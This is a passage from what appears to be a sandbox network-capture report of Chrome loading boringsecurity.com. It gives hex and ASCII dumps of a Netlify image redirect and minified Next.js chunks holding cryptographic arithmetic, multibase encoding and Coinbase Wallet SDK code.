                                                                          2023-12-10 16:44:51 UTC6191INData Raw: db 2f 51 26 dd ed 68 e9 6c 51 58 b7 6e 36 99 5e 17 c9 73 ac b3 d1 bc d3 f3 4e aa 35 18 02 e2 02 09 7f 03 b8 82 87 1d 3f 0a 00 1a 29 93 15 64 20 4c d5 eb ce 8c c8 08 42 05 e8 cc 7c 63 eb e4 6d 09 19 e0 dd 8c 7d dd 9b 43 e2 d3 18 7e 42 c2 a4 01 e1 7c b0 39 66 69 88 a8 7b 2a 55 65 75 b0 f6 f8 f2 61 37 87 a5 84 1f c6 d3 93 85 09 04 72 b2 13 2b e6 9d 37 43 50 1a 26 da 28 d5 2a 55 c1 1f 6e 4a 63 9b d9 73 18 36 e3 06 5e 25 61 ae d2 ad cf 57 c6 03 6a d4 c1 c4 63 ae b8 a4 f9 19 95 a3 32 51 17 3b 76 4e 87 11 6b 5a 1c 0f 51 5b 7f be 5a e0 72 ee 1f db 5c f1 ca 72 f2 88 6c b1 64 21 10 4d c0 6f 5c 34 12 8d 0e e5 ba 0d 82 f9 83 60 b1 99 cf 36 49 dc f4 63 9f cd a3 79 18 51 ed 16 a0 fd f4 9a 7e c2 83 ae 3c 7c fa 04 c9 97 74 e5 f4 5a af 4b bb ee 9a a6 2e 4c 4c 18 fa 36 0d
                                                                          Data Ascii: /Q&hlQXn6^sN5?)d LB|cm}C~B|9fi{*Ueua7r+7CP&(*UnJcs6^%aWjc2Q;vNkZQ[Zr\rld!Mo\4`6IcyQ~<|tZK.LL6


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          102192.168.2.54983675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC632OUTGET /_next/image?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 32 30 34 38 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 62 61 6e 6e 65 72 2e 6a 70 65 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 62 61 6e 6e 65 72 2e 6a 70 65 67 26 77 3d 32 30 34 38 26 71 3d 37 35 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:44:51 GMTLocation: /_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75Server: NetlifySt
                                                                          2023-12-10 16:44:51 UTC103INData Raw: 36 31 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 5f 69 70 78 2f 77 5f 32 30 34 38 2c 71 5f 37 35 2f 25 32 46 69 6d 61 67 65 73 25 32 46 62 61 6e 6e 65 72 2e 6a 70 65 67 3f 75 72 6c 3d 25 32 46 69 6d 61 67 65 73 25 32 46 62 61 6e 6e 65 72 2e 6a 70 65 67 26 77 3d 32 30 34 38 26 71 3d 37 35 0a 0d 0a
                                                                          Data Ascii: 61Redirecting to /_ipx/w_2048,q_75/%2Fimages%2Fbanner.jpeg?url=%2Fimages%2Fbanner.jpeg&w=2048&q=75
                                                                          2023-12-10 16:44:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          103192.168.2.54983575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC564OUTGET /_next/static/chunks/364.0af60d1a7584dacb.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC424INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 35 31 35 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 45 74 61 67 3a
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 251515Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:51 GMTEtag:
                                                                          2023-12-10 16:44:51 UTC762INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 34 5d 2c 7b 36 31 33 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 58 78 3d 74 2e 5f 77 3d 74 2e 61 50 3d 74 2e 4b 53 3d 74 2e 6a 51 3d 76 6f 69 64 20 30 2c 72 28 35 34 38 38 39 29 3b 6c 65 74 20 69 3d 72 28 32 31 33 31 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 6c 65 74 20 74 3d 6e 65 77 20 46 6c 6f 61 74 36 34 41 72 72 61 79 28 31 36 29 3b 69 66 28 65 29 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 74 5b 72 5d 3d 65 5b 72 5d 3b 72 65 74 75 72 6e 20 74 7d 72 28 34 39 36 34 34 29 2c
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[364],{61326:function(e,t,r){"use strict";t.Xx=t._w=t.aP=t.KS=t.jQ=void 0,r(54889);let i=r(21318);function n(e){let t=new Float64Array(16);if(e)for(let r=0;r<e.length;r++)t[r]=e[r];return t}r(49644),
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 36 3b 72 2b 2b 29 65 5b 72 5d 3d 30 7c 74 5b 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 6c 65 74 20 74 3d 31 3b 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 6c 65 74 20 69 3d 65 5b 72 5d 2b 74 2b 36 35 35 33 35 3b 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 69 2f 36 35 35 33 36 29 2c 65 5b 72 5d 3d 69 2d 36 35 35 33 36 2a 74 7d 65 5b 30 5d 2b 3d 74 2d 31 2b 33 37 2a 28 74 2d 31 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 72 29 7b 6c 65 74 20 69 3d 7e 28 72 2d 31 29 3b 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 6c 65 74 20 6e 3d 69 26 28 65 5b 72 5d 5e 74 5b 72 5d 29 3b 65 5b 72 5d 5e 3d 6e 2c 74 5b 72 5d 5e 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 6c 65 74 20 72 3d 6e 28 29 2c 69 3d
                                                                          Data Ascii: 6;r++)e[r]=0|t[r]}function p(e){let t=1;for(let r=0;r<16;r++){let i=e[r]+t+65535;t=Math.floor(i/65536),e[r]=i-65536*t}e[0]+=t-1+37*(t-1)}function f(e,t,r){let i=~(r-1);for(let r=0;r<16;r++){let n=i&(e[r]^t[r]);e[r]^=n,t[r]^=n}}function d(e,t){let r=n(),i=
                                                                          2023-12-10 16:44:51 UTC538INData Raw: 2a 48 2c 49 2b 3d 69 2a 56 2c 50 2b 3d 69 2a 42 2c 53 2b 3d 69 2a 4b 2c 4f 2b 3d 69 2a 46 2c 78 2b 3d 69 2a 5a 2c 43 2b 3d 69 2a 57 2c 41 2b 3d 69 2a 47 2c 52 2b 3d 69 2a 4a 2c 4e 2b 3d 69 2a 59 2c 79 2b 3d 28 69 3d 74 5b 31 32 5d 29 2a 4d 2c 6d 2b 3d 69 2a 71 2c 5f 2b 3d 69 2a 7a 2c 62 2b 3d 69 2a 6b 2c 77 2b 3d 69 2a 24 2c 45 2b 3d 69 2a 55 2c 49 2b 3d 69 2a 48 2c 50 2b 3d 69 2a 56 2c 53 2b 3d 69 2a 42 2c 4f 2b 3d 69 2a 4b 2c 78 2b 3d 69 2a 46 2c 43 2b 3d 69 2a 5a 2c 41 2b 3d 69 2a 57 2c 52 2b 3d 69 2a 47 2c 4e 2b 3d 69 2a 4a 2c 54 2b 3d 69 2a 59 2c 6d 2b 3d 28 69 3d 74 5b 31 33 5d 29 2a 4d 2c 5f 2b 3d 69 2a 71 2c 62 2b 3d 69 2a 7a 2c 77 2b 3d 69 2a 6b 2c 45 2b 3d 69 2a 24 2c 49 2b 3d 69 2a 55 2c 50 2b 3d 69 2a 48 2c 53 2b 3d 69 2a 56 2c 4f 2b 3d 69 2a
                                                                          Data Ascii: *H,I+=i*V,P+=i*B,S+=i*K,O+=i*F,x+=i*Z,C+=i*W,A+=i*G,R+=i*J,N+=i*Y,y+=(i=t[12])*M,m+=i*q,_+=i*z,b+=i*k,w+=i*$,E+=i*U,I+=i*H,P+=i*V,S+=i*B,O+=i*K,x+=i*F,C+=i*Z,A+=i*W,R+=i*G,N+=i*J,T+=i*Y,m+=(i=t[13])*M,_+=i*q,b+=i*z,w+=i*k,E+=i*$,I+=i*U,P+=i*H,S+=i*V,O+=i*
                                                                          2023-12-10 16:44:51 UTC4744INData Raw: 2c 44 2b 3d 69 2a 59 2c 73 2b 3d 33 38 2a 77 2c 6f 2b 3d 33 38 2a 45 2c 61 2b 3d 33 38 2a 49 2c 63 2b 3d 33 38 2a 50 2c 68 2b 3d 33 38 2a 53 2c 6c 2b 3d 33 38 2a 4f 2c 75 2b 3d 33 38 2a 78 2c 70 2b 3d 33 38 2a 43 2c 66 2b 3d 33 38 2a 41 2c 64 2b 3d 33 38 2a 52 2c 67 2b 3d 33 38 2a 4e 2c 76 2b 3d 33 38 2a 54 2c 79 2b 3d 33 38 2a 6a 2c 6d 2b 3d 33 38 2a 4c 2c 5f 2b 3d 33 38 2a 44 2c 6e 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 3d 73 2b 28 6e 3d 31 29 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 73 3d 69 2d 36 35 35 33 36 2a 6e 2c 6e 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 3d 6f 2b 6e 2b 36 35 35 33 35 29 2f 36 35 35 33 36 29 2c 6f 3d 69 2d 36 35 35 33 36 2a 6e 2c 6e 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 69 3d 61 2b 6e 2b 36 35 35 33 35 29 2f 36 35 35 33
                                                                          Data Ascii: ,D+=i*Y,s+=38*w,o+=38*E,a+=38*I,c+=38*P,h+=38*S,l+=38*O,u+=38*x,p+=38*C,f+=38*A,d+=38*R,g+=38*N,v+=38*T,y+=38*j,m+=38*L,_+=38*D,n=Math.floor((i=s+(n=1)+65535)/65536),s=i-65536*n,n=Math.floor((i=o+n+65535)/65536),o=i-65536*n,n=Math.floor((i=a+n+65535)/6553
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 33 5d 3d 31 35 39 35 37 35 30 31 32 39 2c 74 68 69 73 2e 5f 73 74 61 74 65 4c 6f 5b 34 5d 3d 32 39 31 37 35 36 35 31 33 37 2c 74 68 69 73 2e 5f 73 74 61 74 65 4c 6f 5b 35 5d 3d 37 32 35 35 31 31 31 39 39 2c 74 68 69 73 2e 5f 73 74 61 74 65 4c 6f 5b 36 5d 3d 34 32 31 35 33 38 39 35 34 37 2c 74 68 69 73 2e 5f 73 74 61 74 65 4c 6f 5b 37 5d 3d 33 32 37 30 33 33 32 30 39 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 69 74 53 74 61 74 65 28 29 2c 74 68 69 73 2e 5f 62 75 66 66 65 72 4c 65 6e 67 74 68 3d 30 2c 74 68 69 73 2e 5f 62 79 74 65 73 48 61 73 68 65 64 3d 30 2c 74 68 69 73 2e 5f 66 69 6e 69 73 68 65 64 3d 21 31 2c 74 68 69 73 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                          Data Ascii: 3]=1595750129,this._stateLo[4]=2917565137,this._stateLo[5]=725511199,this._stateLo[6]=4215389547,this._stateLo[7]=327033209},e.prototype.reset=function(){return this._initState(),this._bufferLength=0,this._bytesHashed=0,this._finished=!1,this},e.prototype
                                                                          2023-12-10 16:44:51 UTC7116INData Raw: 36 2c 76 2b 3d 67 3e 3e 3e 31 36 2c 72 5b 30 5d 3d 79 3d 36 35 35 33 35 26 67 7c 76 3c 3c 31 36 2c 6e 5b 30 5d 3d 53 3d 36 35 35 33 35 26 66 7c 64 3c 3c 31 36 2c 68 3d 6d 2c 66 3d 36 35 35 33 35 26 28 6c 3d 4f 29 2c 64 3d 6c 3e 3e 3e 31 36 2c 67 3d 36 35 35 33 35 26 68 2c 76 3d 68 3e 3e 3e 31 36 2c 68 3d 72 5b 31 5d 2c 66 2b 3d 36 35 35 33 35 26 28 6c 3d 6e 5b 31 5d 29 2c 64 2b 3d 6c 3e 3e 3e 31 36 2c 67 2b 3d 36 35 35 33 35 26 68 2c 76 2b 3d 68 3e 3e 3e 31 36 2c 64 2b 3d 66 3e 3e 3e 31 36 2c 67 2b 3d 64 3e 3e 3e 31 36 2c 76 2b 3d 67 3e 3e 3e 31 36 2c 72 5b 31 5d 3d 6d 3d 36 35 35 33 35 26 67 7c 76 3c 3c 31 36 2c 6e 5b 31 5d 3d 4f 3d 36 35 35 33 35 26 66 7c 64 3c 3c 31 36 2c 68 3d 5f 2c 66 3d 36 35 35 33 35 26 28 6c 3d 78 29 2c 64 3d 6c 3e 3e 3e 31 36 2c
                                                                          Data Ascii: 6,v+=g>>>16,r[0]=y=65535&g|v<<16,n[0]=S=65535&f|d<<16,h=m,f=65535&(l=O),d=l>>>16,g=65535&h,v=h>>>16,h=r[1],f+=65535&(l=n[1]),d+=l>>>16,g+=65535&h,v+=h>>>16,d+=f>>>16,g+=d>>>16,v+=g>>>16,r[1]=m=65535&g|v<<16,n[1]=O=65535&f|d<<16,h=_,f=65535&(l=x),d=l>>>16,
                                                                          2023-12-10 16:44:51 UTC8302INData Raw: 6f 6e 2e 63 6f 6e 6e 65 63 74 65 64 29 74 72 79 7b 61 77 61 69 74 20 74 68 69 73 2e 6f 70 65 6e 28 29 7d 63 61 74 63 68 28 65 29 7b 69 28 65 29 7d 74 68 69 73 2e 65 76 65 6e 74 73 2e 6f 6e 28 60 24 7b 65 2e 69 64 7d 60 2c 65 3d 3e 7b 65 6f 28 65 29 3f 69 28 65 2e 65 72 72 6f 72 29 3a 72 28 65 2e 72 65 73 75 6c 74 29 7d 29 3b 74 72 79 7b 61 77 61 69 74 20 74 68 69 73 2e 63 6f 6e 6e 65 63 74 69 6f 6e 2e 73 65 6e 64 28 65 2c 74 29 7d 63 61 74 63 68 28 65 29 7b 69 28 65 29 7d 7d 29 7d 73 65 74 43 6f 6e 6e 65 63 74 69 6f 6e 28 65 3d 74 68 69 73 2e 63 6f 6e 6e 65 63 74 69 6f 6e 29 7b 72 65 74 75 72 6e 20 65 7d 6f 6e 50 61 79 6c 6f 61 64 28 65 29 7b 74 68 69 73 2e 65 76 65 6e 74 73 2e 65 6d 69 74 28 22 70 61 79 6c 6f 61 64 22 2c 65 29 2c 65 6e 28 65 29 3f 74 68
                                                                          Data Ascii: on.connected)try{await this.open()}catch(e){i(e)}this.events.on(`${e.id}`,e=>{eo(e)?i(e.error):r(e.result)});try{await this.connection.send(e,t)}catch(e){i(e)}})}setConnection(e=this.connection){return e}onPayload(e){this.events.emit("payload",e),en(e)?th
                                                                          2023-12-10 16:44:51 UTC6188INData Raw: 3a 65 4e 7d 29 3b 6c 65 74 20 65 6a 3d 65 43 28 7b 70 72 65 66 69 78 3a 22 37 22 2c 6e 61 6d 65 3a 22 62 61 73 65 38 22 2c 61 6c 70 68 61 62 65 74 3a 22 30 31 32 33 34 35 36 37 22 2c 62 69 74 73 50 65 72 43 68 61 72 3a 33 7d 29 3b 76 61 72 20 65 4c 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 62 61 73 65 38 3a 65 6a 7d 29 3b 6c 65 74 20 65 44 3d 65 53 28 7b 70 72 65 66 69 78 3a 22 39 22 2c 6e 61 6d 65 3a 22 62 61 73 65 31 30 22 2c 61 6c 70 68 61 62 65 74 3a 22 30 31 32 33 34 35 36 37 38 39 22 7d 29 3b 76 61 72 20 65 4d 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 62 61 73 65 31 30 3a 65 44 7d 29 3b 6c 65 74 20 65 71 3d 65 43 28 7b 70 72 65 66 69 78 3a 22 66 22
                                                                          Data Ascii: :eN});let ej=eC({prefix:"7",name:"base8",alphabet:"01234567",bitsPerChar:3});var eL=Object.freeze({__proto__:null,base8:ej});let eD=eS({prefix:"9",name:"base10",alphabet:"0123456789"});var eM=Object.freeze({__proto__:null,base10:eD});let eq=eC({prefix:"f"
                                                                          2023-12-10 16:44:51 UTC10674INData Raw: 65 20 76 61 72 69 6e 74 22 29 3b 72 3d 65 5b 73 2b 2b 5d 2c 69 2b 3d 6e 3c 32 38 3f 28 31 32 37 26 72 29 3c 3c 6e 3a 28 31 32 37 26 72 29 2a 4d 61 74 68 2e 70 6f 77 28 32 2c 6e 29 2c 6e 2b 3d 37 7d 77 68 69 6c 65 28 72 3e 3d 31 32 38 29 3b 72 65 74 75 72 6e 20 74 69 2e 62 79 74 65 73 3d 73 2d 74 2c 69 7d 76 61 72 20 74 6e 3d 7b 65 6e 63 6f 64 65 3a 74 72 2c 64 65 63 6f 64 65 3a 74 69 2c 65 6e 63 6f 64 69 6e 67 4c 65 6e 67 74 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3c 31 32 38 3f 31 3a 65 3c 31 36 33 38 34 3f 32 3a 65 3c 32 30 39 37 31 35 32 3f 33 3a 65 3c 32 36 38 34 33 35 34 35 36 3f 34 3a 65 3c 33 34 33 35 39 37 33 38 33 36 38 3f 35 3a 65 3c 34 33 39 38 30 34 36 35 31 31 31 30 34 3f 36 3a 65 3c 35 36 32 39 34 39 39 35 33 34 32
                                                                          Data Ascii: e varint");r=e[s++],i+=n<28?(127&r)<<n:(127&r)*Math.pow(2,n),n+=7}while(r>=128);return ti.bytes=s-t,i}var tn={encode:tr,decode:ti,encodingLength:function(e){return e<128?1:e<16384?2:e<2097152?3:e<268435456?4:e<34359738368?5:e<4398046511104?6:e<56294995342


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          104192.168.2.54983775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:51 UTC564OUTGET /_next/static/chunks/331.02933a2f314cb75f.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC424INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 32 30 38 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 31 20 47 4d 54 0d 0a 45 74 61 67 3a
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 520847Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:51 GMTEtag:
                                                                          2023-12-10 16:44:51 UTC762INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 33 31 5d 2c 7b 31 38 35 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 37 33 39 38 32 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 65 2e 43 6f 69 6e 62 61 73 65 57 61 6c 6c 65 74 53 44 4b 3d 76 6f 69 64 20 30 3b 6c 65 74 20 69 3d 72 28 38 31 31 30 35 29 2c 6f 3d 72 28 39 37 35 34 33 29 2c 73 3d 72 28 34 34 37 36 35 29 2c 61 3d 72 28 31 34 33 34 33 29 2c 75 3d 72 28 37 38 37 36 38 29 2c 63 3d 72 28 34 33 39 35
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[331],{1859:function(t,e,r){"use strict";var n=r(73982);Object.defineProperty(e,"__esModule",{value:!0}),e.CoinbaseWalletSDK=void 0;let i=r(81105),o=r(97543),s=r(44765),a=r(14343),u=r(78768),c=r(4395
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 73 2e 5f 6f 76 65 72 72 69 64 65 49 73 43 6f 69 6e 62 61 73 65 42 72 6f 77 73 65 72 3d 6e 75 6c 6c 21 3d 3d 28 72 3d 74 2e 6f 76 65 72 72 69 64 65 49 73 43 6f 69 6e 62 61 73 65 42 72 6f 77 73 65 72 29 26 26 76 6f 69 64 20 30 21 3d 3d 72 26 26 72 2c 74 2e 64 69 61 67 6e 6f 73 74 69 63 4c 6f 67 67 65 72 26 26 74 2e 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 27 74 20 68 61 76 65 20 62 6f 74 68 20 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 20 61 6e 64 20 64 69 61 67 6e 6f 73 74 69 63 4c 6f 67 67 65 72 20 6f 70 74 69 6f 6e 73 2c 20 75 73 65 20 6f 6e 6c 79 20 64 69 61 67 6e 6f 73 74 69 63 4c 6f 67 67 65 72 22 29 3b 74 2e 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 74 68 69 73 2e 5f 64 69 61 67 6e 6f 73 74 69 63 4c 6f 67
                                                                          Data Ascii: s._overrideIsCoinbaseBrowser=null!==(r=t.overrideIsCoinbaseBrowser)&&void 0!==r&&r,t.diagnosticLogger&&t.eventListener)throw Error("Can't have both eventListener and diagnosticLogger options, use only diagnosticLogger");t.eventListener?this._diagnosticLog
                                                                          2023-12-10 16:44:51 UTC538INData Raw: 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 74 3d 77 69 6e 64 6f 77 2e 63 6f 69 6e 62 61 73 65 57 61 6c 6c 65 74 45 78 74 65 6e 73 69 6f 6e 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 77 69 6e 64 6f 77 2e 77 61 6c 6c 65 74 4c 69 6e 6b 45 78 74 65 6e 73 69 6f 6e 7d 67 65 74 20 63 6f 69 6e 62 61 73 65 42 72 6f 77 73 65 72 28 29 7b 76 61 72 20 74 2c 65 3b 74 72 79 7b 6c 65 74 20 72 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 77 69 6e 64 6f 77 2e 65 74 68 65 72 65 75 6d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 77 69 6e 64 6f 77 2e 74 6f 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 65 74 68 65 72 65 75 6d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 69 66 28 22 69 73 43 6f 69 6e 62 61 73 65 42 72 6f 77 73 65 72
                                                                          Data Ascii: turn null!==(t=window.coinbaseWalletExtension)&&void 0!==t?t:window.walletLinkExtension}get coinbaseBrowser(){var t,e;try{let r=null!==(t=window.ethereum)&&void 0!==t?t:null===(e=window.top)||void 0===e?void 0:e.ethereum;if(!r)return;if("isCoinbaseBrowser
